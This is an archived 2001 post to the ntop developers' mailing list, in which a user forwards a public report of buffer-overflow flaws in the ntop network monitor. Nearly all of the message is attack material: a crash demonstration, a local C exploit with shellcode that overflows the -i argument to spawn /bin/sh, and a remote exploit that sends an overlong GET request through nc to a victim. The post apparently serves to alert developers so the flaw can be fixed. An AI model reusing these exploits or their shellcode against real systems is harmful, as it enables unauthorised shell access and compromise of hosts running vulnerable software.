'[Ntop-dev] ntop hack:(((((((((((((('

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       ntop-dev
Subject:    [Ntop-dev] ntop hack:((((((((((((((
From:       <Alexei.Voronine () dvg ! de>
Date:       2001-10-11 7:31:27
Message-ID: OF5AEE0CD3.C790C17E-ONC1256AE2.00289EAB () i001 ! dvg ! sko ! de
[Download RAW message or body]

Hi,
Look at that!!!

Source
http://www.webdoc.ru/text.phtml?level=2&id=98&script_id=237&url=texts/201-300/237.html

(in russian, use online translator on altavista.com)

tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`

24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00
07:04:32 PM build)
24/Oct/2000:12:32:16 Listening on
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri@ntop.org>
24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
24/Oct/2000:12:32:16 Initialising...
Segmentation fault
tshaw:/home/cb/ntop-1.3.2$


EXPLOIT
========

#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#define LEN 208

int main (int argc, char **argv)
{
char buf[LEN + 12];
intret = 0xbffffba0;
int*p;

char code[]=
"\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
"\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

if (argc > 1) {
ret += atoi(argv[1]);

fprintf(stderr, "Using ret %#010x\n", ret);
}

memset(buf, '\x90', LEN);
memcpy(buf + LEN - strlen(code), code, strlen(code));

p = (int *) (buf + LEN);

*p++ = ret;
*p++ = ret;
*p = 0;

 execl("./ntop", "ntop", "-i", buf, NULL);

}


REMOTE EXPLOIT
=================

#include <stdio.h>
#include <string.h>


char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

void usage()
{
 printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
 printf(" mat@hacksware.com\n");
 printf("Usage : ./ntop-w-exp | nc victim port\n");
 exit(0);
}

void main( int argc, char *argv[] )
{
int i,offset=-24;
#define CODE_LEN 240
#define NOP_LEN 50
char code_buf[CODE_LEN];
unsigned long esp=0xbedffb00;

if(argc >= 2) offset = atoi(argv[1]);

memset(code_buf,0x90,NOP_LEN); //insert NOP CODES
memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));
for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4)
 *(long *)&code_buf[i]=(unsigned long)esp-offset;

printf("GET /");
for(i=0;i<CODE_LEN; i++)
{
 putchar(code_buf[i]);
}
printf("\r\n\r\n");
}



Mit freundlichen Grüßen

Alexei Voronine

dvg Hannover
OE352 UNIX Server Control Center (USCC)
e-Mail   Alexei.Voronine@dvg.de
Tel:       0511-5102-3703



[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic